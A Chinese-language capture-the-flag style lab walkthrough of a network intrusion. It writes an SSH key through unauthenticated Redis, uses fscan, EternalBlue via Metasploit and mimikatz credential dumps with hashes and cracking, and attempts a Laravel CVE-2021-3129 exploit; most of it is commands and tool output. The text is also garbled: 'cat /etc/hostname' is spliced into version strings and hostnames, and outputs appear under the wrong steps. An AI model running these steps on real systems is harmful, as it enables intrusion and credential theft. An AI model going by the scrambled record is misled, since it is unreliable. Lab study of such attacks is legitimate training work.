一、靶场干系信息
二、信息搜集
TCP 端口扫描 + 指纹辨认 + 利用体系辨认:- sudo rustscan -a 192.168.111.20 -r 1-65535 -- -sV -O -Pn -n -oA TCP_PORTS_NAMP
- PORT STATE SERVICE REASON VERSION
- 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4cat /etc/hostname0.4 (Ubuntu Linux; protocol 2.0)
- 80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
- 81/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
- 6379/tcp open redis syn-ack ttl 63 Redis key-value store 2.8.17
- OS:Ubuntu
- 6379 端口:年代久远,默认设置下极大概率存在未授权访问
UDP 端口扫描 + 指纹辨认:- sudo nmap -sV -sU --top-ports 20 192.168.111.20 -Pn -n -oA UDP_TOP20_PORTS
思绪:先处理处罚 TCP 端口,若 TCP 端口没有突破,则回到 UDP 端口,用特定的工具举行扫描。
综合上述信息,如今最优先思量的就是 6379 端口,其次是 80 和 81 这两个 http 服务。
三、Redis 未授权访问
Redis 在 2.8 如许的老版本里:
- 默认监听所在是 0.0.0.0(对全部网络接口开放)
- 没有设置暗码(requirepass 为空)
- protected-mode 这个掩护机制是 3.2 版本以后才引入的,2.8 完全没有这个功能。
- 靶场环境通常不会额外加固防火墙或设置
protected-mode 是 Redis 从 3.2 版本开始引入的一个默认安全掩护机制。简朴说,它的作用是:当 Redis 没有设置暗码(requirepass 为空),也没有明确绑定只允许本地访问(bind 127.0.0.1)的时间,就主动把外部网络的毗连全部拒绝,只允许本机(localhost)连进来。
实行无暗码登入:- redis-cli -h 192.168.111.20 -p 6379
简朴做一下信息搜集,利用了下述下令:
- ping:用于测试是否是真的毗连上了
- info:Redis 版本、OS、内存、已毗连客户端数等信息
- client list:全部已毗连客户端的 IP 和端口
- config get dbfilename:当前 RDB 文件名
- config get dir:当前 RDB 长期化目次
关键信息:- redis_version:2.8.17
- os:Linux 5.4.0-66-generic x86_64
- dbfilename dump.rdb
- dir /root
- rdb_last_save_time:1775801194
- rdb_last_bgsave_status:ok
而我们知道,/root 目次的权限是 700,即只有 root 用户才有写权限。
因此,我们可以确认,当前的 Redis 是 root 权限下运行的。
根据之前端口扫描看到的 22 端口开放,于是通过 redis 写入 ssh 公钥 $\to$ ssh 毗连就是如今的紧张目的。
如今 kali 上天生 ssh 密钥对:- ssh-keygen -t rsa -f ./target
- ❯ cat target.pub
- ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYrIRFtsijwuU43JeBFUwC04tSP3jNnl3ujMwgOO7FIOaDe0c7Wsp+qk/vpSKfhnTfyPAmHrO5q58zbDuFCzBrQrUNxUXVXJaO6k8csJ2VuPBh5YN7W61q9Cs62BacSX9QHDv+EhCkewVW2O3oGWbvWODnQh8tbwV815HyP15hlIXrisEp9DHWqhvz2scKYcVPw38g31yUJkcMU4T83yMziBSIKgDi/6+RB7JsJXZ+x72QAQtFes6JHYDl1Z3NQmPCdesww/Bx0hwXOx3d9LJAtpV9WIPMVbK05bMlwdDs321yX060WZOJwrQBgG2gqLNANjjouOIJlyrHLNRt5QfACNkFWNehWtckYLtV1/03cF02medJ/IJMt1yokLo/O2hcG0NK8vOxbUbcBrXUfHxHUWSUYwyag7L0SYctycjCi7lIXze8UhTf7C8oT7fPPzRiuoEu6KRuxXCxEJEOBa928iD/OhLu0JlVf+W2NrAnw3zJZJjh9ckHhATu+oFagg0= zyf@kali
- SET pubkey "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYrIRFtsijwuU43JeBFUwC04tSP3jNnl3ujMwgOO7FIOaDe0c7Wsp+qk/vpSKfhnTfyPAmHrO5q58zbDuFCzBrQrUNxUXVXJaO6k8csJ2VuPBh5YN7W61q9Cs62BacSX9QHDv+EhCkewVW2O3oGWbvWODnQh8tbwV815HyP15hlIXrisEp9DHWqhvz2scKYcVPw38g31yUJkcMU4T83yMziBSIKgDi/6+RB7JsJXZ+x72QAQtFes6JHYDl1Z3NQmPCdesww/Bx0hwXOx3d9LJAtpV9WIPMVbK05bMlwdDs321yX060WZOJwrQBgG2gqLNANjjouOIJlyrHLNRt5QfACNkFWNehWtckYLtV1/03cF02medJ/IJMt1yokLo/O2hcG0NK8vOxbUbcBrXUfHxHUWSUYwyag7L0SYctycjCi7lIXze8UhTf7C8oT7fPPzRiuoEu6KRuxXCxEJEOBa928iD/OhLu0JlVf+W2NrAnw3zJZJjh9ckHhATu+oFagg0= zyf@kali\n\n"
- CONFIG SET dir /root/.ssh/
- CONFIG SET dbfilename authorized_keys
- SAVE
实行 ssh 登入:- ssh root@192.168.111.20 -i ./target
登入乐成。
四、Ubuntu 信息搜集
先用原生下令做一下信息搜集:- root@cat /etc/hostname:~# ip addr
- 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
- link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
- inet 127.0.0.1/8 scope host lo
- valid_lft forever preferred_lft forever
- inet6 ::1/128 scope host
- valid_lft forever preferred_lft forever
- 2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
- link/ether 00:50:56:b1:41:a3 brd ff:ff:ff:ff:ff:ff
- inet 192.168.111.20/24 brd 192.168.111.255 scope global ens33
- valid_lft forever preferred_lft forever
- inet6 fe80::250:56ff:feb1:41a3/64 scope link
- valid_lft forever preferred_lft forever
- 3: ens38: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
- link/ether 00:50:56:b1:f7:eb brd ff:ff:ff:ff:ff:ff
- inet 192.168.52.10/24 brd 192.168.52.255 scope global ens38
- valid_lft forever preferred_lft forever
- inet6 fe80::250:56ff:feb1:f7eb/64 scope link
- valid_lft forever preferred_lft forever
- 外网:192.168.111.20
- 内网:192.168.52.10
- 内网网段:192.168.52.0/24
- root@cat /etc/hostname:~# cat /proc/version
- Linux version 5.4.0-66-generic (buildd@lgw01-amd64-016) (gcc version 7.5.0 (Ubuntu 7.5.0-3cat /etc/hostname1~18.04)) #74~18.04.2-Ubuntu SMP Fri Feb 5 11:17:31 UTC 2021
- root@cat /etc/hostname:~# cat /etc/os-release
- NAME="Ubuntu"
- VERSION="18.04.5 LTS (Bionic Beaver)"
- ID=cat /etc/hostname
- ID_LIKE=debian
- PRETTY_NAME="Ubuntu 18.04.5 LTS"
- VERSION_ID="18.04"
- HOME_URL="https://www.cat /etc/hostname.com/"
- SUPPORT_URL="https://help.cat /etc/hostname.com/"
- BUG_REPORT_URL="https://bugs.launchpad.net/cat /etc/hostname/"
- PRIVACY_POLICY_URL="https://www.cat /etc/hostname.com/legal/terms-and-policies/privacy-policy"
- VERSION_CODENAME=bionic
- UBUNTU_CODENAME=bionic
- root@cat /etc/hostname:~# hostname && cat /etc/issue && uname -a && cat /etc/hostscat /etc/hostname
- Ubuntu 18.04.5 LTS \n \l
- Linux cat /etc/hostname 5.4.0-66-generic #74~18.04.2-Ubuntu SMP Fri Feb 5 11:17:31 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
- 127.0.0.1 localhost
- 127.0.1.1 cat /etc/hostname
- 47.101.57.72 whoamianony.top
- 127.0.0.1 www.whopen.com
- # The following lines are desirable for IPv6 capable hosts
- ::1 ip6-localhost ip6-loopback
- fe00::0 ip6-localnet
- ff00::0 ip6-mcastprefix
- ff02::1 ip6-allnodes
- ff02::2 ip6-allrouters
- root@cat /etc/hostname:~# ip route show
- 192.168.52.0/24 dev ens38 proto kernel scope link src 192.168.52.10
- 192.168.111.0/24 dev ens33 proto kernel scope link src 192.168.111.20
检察 ARP 缓存:- root@cat /etc/hostname:~# ip neigh
- 192.168.52.20 dev ens38 lladdr 00:50:56:b1:7e:66 STALE
- 192.168.111.25 dev ens33 lladdr 00:50:56:b1:87:ea REACHABLE
检察全部历程:没有防火墙且收支自由。
下一步就是内网信息搜集了。
五、Fscan
通过 scp 下令上传 fscan 到服务器上,开始内网信息搜集:- root@cat /etc/hostname:~# iptables -L -v -n 2>/dev/null
- Chain INPUT (policy ACCEPT 71 packets, 4966 bytes)
- pkts bytes target prot opt in out source destination
- Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
- pkts bytes target prot opt in out source destination
- Chain OUTPUT (policy ACCEPT 66 packets, 5906 bytes)
- pkts bytes target prot opt in out source destination
- root@cat /etc/hostname:~# ufw status 2>/dev/null
- Status: inactive
- scp -i target /usr/local/bin/fscan root@192.168.111.20:/tmp/
扫描的时间忘记把本机扫除了 😛,花得时间略长。各人可以利用:- scp -i target /usr/local/bin/fscan root@192.168.111.20:/tmp/ -hn 192.168.52.10
效果:- ./fscan -h 192.168.52.0/24 -hn 192.168.52.10
扫描忘记扫除本主机固然是失误,但是也让我看到了 fscan 的好用,之前分析的效果 fscan 一个扫描全出来了……,不外这也依靠于指纹库和毛病库,并不是全部的环境都能涵盖的。
整理一下信息:
1、192.168.52.20
端口开放环境以及干系指纹信息:- start infoscan
- (icmp) Target 192.168.52.10 is alive
- (icmp) Target 192.168.52.20 is alive
- (icmp) Target 192.168.52.30 is alive
- [*] Icmp alive hosts len is: 3
- 192.168.52.10:81 open
- 192.168.52.10:80 open
- 192.168.52.20:22 open
- 192.168.52.10:22 open
- 192.168.52.30:135 open
- 192.168.52.30:445 open
- 192.168.52.30:139 open
- 192.168.52.10:6379 open
- 192.168.52.30:8080 open
- 192.168.52.20:8000 open
- [*] alive ports len is: 10
- start vulscan
- [*] WebTitle http://192.168.52.10 code:502 len:584 title:502 Bad Gateway
- [*] NetBios 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
- [*] NetBios 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
- [*] WebTitle http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统 [+] InfoScan http://192.168.52.30:8080 [通达OA]
- [*] WebTitle http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统
- [+] InfoScan http://192.168.52.30:8080 [通达OA]
- [*] WebTitle http://192.168.52.10:81 code:200 len:17474 title:Laravel
- [*] WebTitle http://192.168.52.20:8000 code:200 len:17474 title:Laravel
- [+] InfoScan http://192.168.52.20:8000 [Laravel]
- [+] InfoScan http://192.168.52.10:81 [Laravel]
- [+] PocScan http://192.168.52.30:8080 tongda-user-session-disclosure
- [+] Redis 192.168.52.10:6379 unauthorized file:/root/.ssh/authorized_keys
- [+] Redis 192.168.52.10:6379 like can write /root/.ssh/
- [+] Redis 192.168.52.10:6379 like can write /var/spool/cron/
- 192.168.52.20:22 open
- 192.168.52.20:8000 open
- [*] WebTitle http://192.168.52.20:8000 code:200 len:17474 title:Laravel
- [+] InfoScan http://192.168.52.20:8000 [Laravel]
- [+] PocScan http://192.168.52.10:81 C:\Windows\system32>arp -a
- arp -a
- Interface: 192.168.52.30 --- 0xb
- Internet Address Physical Address Type
- 192.168.52.10 00-50-56-b1-f7-eb dynamic
- 192.168.52.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
- Interface: 169.254.129.186 --- 0x16
- Internet Address Physical Address Type
- 169.254.255.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
- 255.255.255.255 ff-ff-ff-ff-ff-ff static
- Interface: 192.168.93.20 --- 0x17
- Internet Address Physical Address Type
- 192.168.93.30 00-50-56-b1-03-a1 dynamic
- 192.168.93.40 00-50-56-b1-a1-a3 dynamic
- 192.168.93.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
- 已完成 8/10 [-] ssh 192.168.52.10:22 root Aa1234. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 8/10 [-] ssh 192.168.52.10:22 admin Admin@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 8/10 [-] ssh 192.168.52.10:22 admin 1qaz2wsx ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 9/10 [-] ssh 192.168.52.20:22 root root@111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 9/10 [-] ssh 192.168.52.20:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 9/10 [-] ssh 192.168.52.20:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 10/10
- [*] 扫描结束,耗时: 7m12.740113763s
- 192.168.52.20:22 open
- 192.168.52.20:8000 open
- [*] WebTitle http://192.168.52.20:8000 code:200 len:17474 title:Laravel
- [+] InfoScan http://192.168.52.20:8000 [Laravel]
- [+] PocScan http://192.168.52.20:8000 C:\Windows\system32>arp -a
- arp -a
- Interface: 192.168.52.30 --- 0xb
- Internet Address Physical Address Type
- 192.168.52.10 00-50-56-b1-f7-eb dynamic
- 192.168.52.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
- Interface: 169.254.129.186 --- 0x16
- Internet Address Physical Address Type
- 169.254.255.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
- 255.255.255.255 ff-ff-ff-ff-ff-ff static
- Interface: 192.168.93.20 --- 0x17
- Internet Address Physical Address Type
- 192.168.93.30 00-50-56-b1-03-a1 dynamic
- 192.168.93.40 00-50-56-b1-a1-a3 dynamic
- 192.168.93.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
端口开放环境:- 已完成 9/10 [-] ssh 192.168.52.20:22 root root@111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 9/10 [-] ssh 192.168.52.20:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 9/10 [-] ssh 192.168.52.20:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 10/10
- 192.168.52.30:135 open
- 192.168.52.30:445 open
- 192.168.52.30:139 open
- 192.168.52.30:8080 open
- 可以判定这是一个域环境:
- 域名:whoamianony.org
- 本主机名:PC1
- 8080 运行着一个“通达OA网络智能办公体系”,大概存在 nday
扫描得到本主机存在永恒之蓝毛病:- [*] NetBios 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
- [*] WebTitle http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统 [+] InfoScan http://192.168.52.30:8080 [通达OA]
六、永恒之蓝
MSF 有模块,可以直接实行打永恒之蓝。
在此之前,先把署理创建好。
1、署理的创建
根据后续利用的 payload 是 reverse 照旧 bind,我们视环境选择创建正向署理照旧反向署理。
我选择的是“正向署理 + bind payload”。
创建 socks5 署理:- [+] MS17-010 192.168.52.30 (Windows 7 Professional 7601 Service Pack 1)
调出 MSF:- ssh -i target -D 1080 -N -C root@192.168.111.20
- ssh -i target -R 0.0.0.0:4444:localhost:4444 -R 0.0.0.0:6666:localhost:6666 root@192.168.111.20 -N
- setg Proxies socks5h://127.0.0.1:1080
- msf > use exploit/windows/smb/ms17_010_eternalblue
留意选择带 bind 的。
设置须要参数:- msf exploit(windows/smb/ms17_010_eternalblue) > set payload payload/windows/x64/meterpreter/bind_tcp
- msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30
3、信息搜集
(1)网络信息
搜集一下根本的信息:- msf exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/enum_domain
- msf post(windows/gather/enum_domain) > set session 1
- session => 1
- 192.168.52.30
- 192.168.93.20
而且可以得知本机名是 PC1,域名是 whoamianony.org
而且根据:- C:\Windows\system32>ipconfig /all
- ipconfig /all
- Windows IP Configuration
- Host Name . . . . . . . . . . . . : PC1
- Primary Dns Suffix . . . . . . . : whoamianony.org
- Node Type . . . . . . . . . . . . : Hybrid
- IP Routing Enabled. . . . . . . . : No
- WINS Proxy Enabled. . . . . . . . : No
- DNS Suffix Search List. . . . . . : whoamianony.org
- Ethernet adapter �������� 4:
- Connection-specific DNS Suffix . :
- Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
- Physical Address. . . . . . . . . : 00-50-56-B1-7F-9E
- DHCP Enabled. . . . . . . . . . . : No
- Autoconfiguration Enabled . . . . : Yes
- Link-local IPv6 Address . . . . . : fe80::a48c:626e:c838:265%23(Preferred)
- IPv4 Address. . . . . . . . . . . : 192.168.93.20(Preferred)
- Subnet Mask . . . . . . . . . . . : 255.255.255.0
- Default Gateway . . . . . . . . . :
- DHCPv6 IAID . . . . . . . . . . . : 721423401
- DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
- DNS Servers . . . . . . . . . . . : 192.168.93.30
- NetBIOS over Tcpip. . . . . . . . : Enabled
- Ethernet adapter Npcap Loopback Adapter:
- Connection-specific DNS Suffix . :
- Description . . . . . . . . . . . : Npcap Loopback Adapter
- Physical Address. . . . . . . . . : 02-00-4C-4F-4F-50
- DHCP Enabled. . . . . . . . . . . : Yes
- Autoconfiguration Enabled . . . . : Yes
- Link-local IPv6 Address . . . . . : fe80::b461:ccad:e30f:81ba%22(Preferred)
- Autoconfiguration IPv4 Address. . : 169.254.129.186(Preferred)
- Subnet Mask . . . . . . . . . . . : 255.255.0.0
- Default Gateway . . . . . . . . . :
- DHCPv6 IAID . . . . . . . . . . . : 268566604
- DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
- DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
- fec0:0:0:ffff::2%1
- fec0:0:0:ffff::3%1
- NetBIOS over Tcpip. . . . . . . . : Enabled
- Ethernet adapter ��������:
- Connection-specific DNS Suffix . :
- Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
- Physical Address. . . . . . . . . : 00-50-56-B1-54-16
- DHCP Enabled. . . . . . . . . . . : No
- Autoconfiguration Enabled . . . . : Yes
- Link-local IPv6 Address . . . . . : fe80::858b:43d6:476c:6a3%11(Preferred)
- IPv4 Address. . . . . . . . . . . : 192.168.52.30(Preferred)
- Subnet Mask . . . . . . . . . . . : 255.255.255.0
- Default Gateway . . . . . . . . . : 192.168.52.2
- DHCPv6 IAID . . . . . . . . . . . : 234884137
- DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
- DNS Servers . . . . . . . . . . . : 192.168.52.2
- NetBIOS over Tcpip. . . . . . . . : Enabled
- Tunnel adapter isatap.{4DAEBDFD-0177-4691-8243-B73297E2F0FF}:
- Media State . . . . . . . . . . . : Media disconnected
- Connection-specific DNS Suffix . :
- Description . . . . . . . . . . . : Microsoft ISATAP Adapter
- Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
- DHCP Enabled. . . . . . . . . . . : No
- Autoconfiguration Enabled . . . . : Yes
- Tunnel adapter isatap.{55ECD929-FBB2-4D96-B43D-8FFEB14A169F}:
- Media State . . . . . . . . . . . : Media disconnected
- Connection-specific DNS Suffix . :
- Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
- Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
- DHCP Enabled. . . . . . . . . . . : No
- Autoconfiguration Enabled . . . . : Yes
- Tunnel adapter isatap.{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C}:
- Media State . . . . . . . . . . . : Media disconnected
- Connection-specific DNS Suffix . :
- Description . . . . . . . . . . . : Microsoft ISATAP Adapter #3
- Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
- DHCP Enabled. . . . . . . . . . . : No
- Autoconfiguration Enabled . . . . : Yes
(2)域控确认
确认一下上面得到的结论:- DNS Servers . . . . . . . . . . . : 192.168.93.30
net ... /domain 这类带 /domain 参数的下令,不是用本地 SYSTEM 身份去查询,而是用这台主机的盘算机账户(Machine Account,比方 WIN-XXXX$@whoamianony.org)的身份,通过网络向域控发起 LDAP/SAMR 查询。
切换回 MSF,用 MSF 自带的域网络模块 post/windows/gather/enum_domain
挂起当前的 session:- C:\Windows\system32>chcp 65001
- chcp 65001
- Active code page: 65001
- C:\Windows\system32>net group "Domain Controllers" /domain
- net group "Domain Controllers" /domain
- The request will be processed at a domain controller for domain whoamianony.org.
- System error 5 has occurred.
- Access is denied.
利用模块并设置信息:跑:- msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30
- msf post(windows/gather/enum_domain) > msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30[+] Domain FQDN: whoamianony.org[+] Domain NetBIOS Name: WHOAMIANONY[+] Domain Controller: DC.whoamianony.org (IP: 192.168.93.30)
- [*] Post module execution completed
(3)路由信息
检察本地的路由是否能到达域控:- msf post(windows/gather/enum_domain) > run
- [+] Domain FQDN: whoamianony.org
- [+] Domain NetBIOS Name: WHOAMIANONY
- [+] Domain Controller: DC.whoamianony.org (IP: 192.168.93.30)
- [*] Post module execution completed
(4)搜集根据
根据搜集:- C:\Windows\system32>route print
- route print
- ===========================================================================
- Interface List
- 23...00 50 56 b1 7f 9e ......Intel(R) PRO/1000 MT Network Connection #2
- 22...02 00 4c 4f 4f 50 ......Npcap Loopback Adapter
- 11...00 50 56 b1 54 16 ......Intel(R) PRO/1000 MT Network Connection
- 1...........................Software Loopback Interface 1
- 12...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
- 15...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
- 16...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #3
- ===========================================================================
- IPv4 Route Table
- ===========================================================================
- Active Routes:
- Network Destination Netmask Gateway Interface Metric
- 0.0.0.0 0.0.0.0 192.168.52.2 192.168.52.30 266
- 127.0.0.0 255.0.0.0 On-link 127.0.0.1 306
- 127.0.0.1 255.255.255.255 On-link 127.0.0.1 306
- 127.255.255.255 255.255.255.255 On-link 127.0.0.1 306
- 169.254.0.0 255.255.0.0 On-link 169.254.129.186 286
- 169.254.129.186 255.255.255.255 On-link 169.254.129.186 286
- 169.254.255.255 255.255.255.255 On-link 169.254.129.186 286
- 192.168.52.0 255.255.255.0 On-link 192.168.52.30 266
- 192.168.52.30 255.255.255.255 On-link 192.168.52.30 266
- 192.168.52.255 255.255.255.255 On-link 192.168.52.30 266
- 192.168.93.0 255.255.255.0 On-link 192.168.93.20 266
- 192.168.93.20 255.255.255.255 On-link 192.168.93.20 266
- 192.168.93.255 255.255.255.255 On-link 192.168.93.20 266
- 224.0.0.0 240.0.0.0 On-link 127.0.0.1 306
- 224.0.0.0 240.0.0.0 On-link 192.168.52.30 266
- 224.0.0.0 240.0.0.0 On-link 192.168.93.20 266
- 224.0.0.0 240.0.0.0 On-link 169.254.129.186 286
- 255.255.255.255 255.255.255.255 On-link 127.0.0.1 306
- 255.255.255.255 255.255.255.255 On-link 192.168.52.30 266
- 255.255.255.255 255.255.255.255 On-link 192.168.93.20 266
- 255.255.255.255 255.255.255.255 On-link 169.254.129.186 286
- ===========================================================================
- Persistent Routes:
- Network Address Netmask Gateway Address Metric
- 0.0.0.0 0.0.0.0 192.168.52.2 Default
- ===========================================================================
- IPv6 Route Table
- ===========================================================================
- Active Routes:
- If Metric Network Destination Gateway
- 1 306 ::1/128 On-link
- 11 266 fe80::/64 On-link
- 23 266 fe80::/64 On-link
- 22 286 fe80::/64 On-link
- 11 266 fe80::858b:43d6:476c:6a3/128
- On-link
- 23 266 fe80::a48c:626e:c838:265/128
- On-link
- 22 286 fe80::b461:ccad:e30f:81ba/128
- On-link
- 1 306 ff00::/8 On-link
- 11 266 ff00::/8 On-link
- 23 266 ff00::/8 On-link
- 22 286 ff00::/8 On-link
- ===========================================================================
- Persistent Routes:
- None
再多试几个下令(这里实行了多个根据抓取下令,下面仅展示有用的那条):- meterpreter > load kiwi
- Loading extension kiwi...
- .#####. mimikatz 2.2.0 20191125 (x64/windows)
- .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
- ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
- ## \ / ## > http://blog.gentilkiwi.com/mimikatz
- '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
- '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
- Success.
- meterpreter > creds_all
- [+] Running as SYSTEM
- [*] Retrieving all credentials
- msv credentials
- ===============
- Username Domain NTLM SHA1
- -------- ------ ---- ----
- PC1$ WHOAMIANONY 3e6a3d8c713b4821eaa51aab25f52074 d8e1318a24c64b8fcc89dc8609b09af50342bacf
- wdigest credentials
- ===================
- Username Domain Password
- -------- ------ --------
- (null) (null) (null)
- PC1$ WHOAMIANONY %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol
- ;
- kerberos credentials
- ====================
- Username Domain Password
- -------- ------ --------
- (null) (null) (null)
- pc1$ whoamianony.org %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f
- >[ol;
- pc1$ WHOAMIANONY.ORG %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f
- >[ol;
- meterpreter > kiwi_cmd "lsadump::cache"
- Domain : PC1
- SysKey : fd4639f4e27c79683ae9fee56b44393f
- Local name : PC1 ( S-1-5-21-1982601180-2087634876-2293013296 )
- Domain name : WHOAMIANONY ( S-1-5-21-1315137663-3706837544-1429009142 )
- Domain FQDN : whoamianony.org
- Policy subsystem is : 1.11
- LSA Key(s) : 1, default {c4f0262f-f9ba-5833-89e5-1264beb97c37}
- [00] {c4f0262f-f9ba-5833-89e5-1264beb97c37} 12ec51d5510d2e28b5f273a98a547e21ceec081867af5348f219b08215f27558
- * Iteration is set to default (10240)
- [NL$1 - 2021/2/22 18:53:27]
- RID : 00000458 (1112)
- User : WHOAMIANONY\bunny
- MsCacheV2 : 00dd17d44798d1ac5f335365db696d1e
- [NL$2 - 2025/9/18 17:05:27]
- RID : 000001f4 (500)
- User : WHOAMIANONY\Administrator
- MsCacheV2 : 2f44261182b156fe4e2cb03b39925b72
MsCacheV2:Domain Cached Credentials v2(DCC2) 格式的缓存哈希。
RID账户500Administrator(内置管理员)501Guest502krbtgt(域控特有)512Domain Admins 组如今知道:
- Username:Administrator
- MsCacheV2:2f44261182b156fe4e2cb03b39925b72
DCC2 无法直接用于登入账户,可以实行本地撞一下 Hash(各人可以不消实行,缘故因由看下面写的“全局视角”):- [NL$2 - 2025/9/18 17:05:27]
- RID : 000001f4 (500)
- User : WHOAMIANONY\Administrator
- MsCacheV2 : 2f44261182b156fe4e2cb03b39925b72
全局视角:固然靶场暗码通常很简朴,但是本次的暗码 Whoami2021 并不在 rockyou 里,以是爆破不出来……
4、思绪调解
再次更新一下靶场图:
域内另有其他呆板吗?
检察一下 PC1 的 arp 缓存:- echo '$DCC2$10240#Administrator#2f44261182b156fe4e2cb03b39925b72' > /tmp/dcc2.hash
- hashcat -m 2100 /tmp/dcc2.hash /usr/share/wordlists/rockyou.txt
实行了一下 MSF 的扫描模块,都没有任何的效果,应该是防火墙的缘故,因此,我们可以先把目的转移到 192.168.52.20 这台主机上。
七、192.168.52.20
1、cve-2021-3129
192.168.52.20 的 8000 端口上运行着 http 服务,而且之前扫描效果表现,大概存在:- C:\Windows\system32>arp -a
- arp -a
- Interface: 192.168.52.30 --- 0xb
- Internet Address Physical Address Type
- 192.168.52.10 00-50-56-b1-f7-eb dynamic
- 192.168.52.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
- Interface: 169.254.129.186 --- 0x16
- Internet Address Physical Address Type
- 169.254.255.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
- 255.255.255.255 ff-ff-ff-ff-ff-ff static
- Interface: 192.168.93.20 --- 0x17
- Internet Address Physical Address Type
- 192.168.93.30 00-50-56-b1-03-a1 dynamic
- 192.168.93.40 00-50-56-b1-a1-a3 dynamic
- 192.168.93.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
- poc-yaml-laravel-cve-2021-3129
- git clone poc-yaml-laravel-cve-2021-3129.git
- git clone https://github.com/ajisai-babu/CVE-2021-3129-exp.git
留意:这里利用了 proxychains 这个工具,其作用就是让后续下令走署理。这个工具在这就不先容了,各人可以自行网络搜刮该工具的用法。
用蚁剑(大概其他 Webshell 管理工具都可以)担当,先设置蚁剑的署理:
记得点击生存
添加数据:
担当乐成。
2、信息搜集
www-data 权限并不高,而且发现一些常见的网络下令也没有:- ❯ proxychains python CVE-2021-3129.py -u http://192.168.52.20:8000 --exp
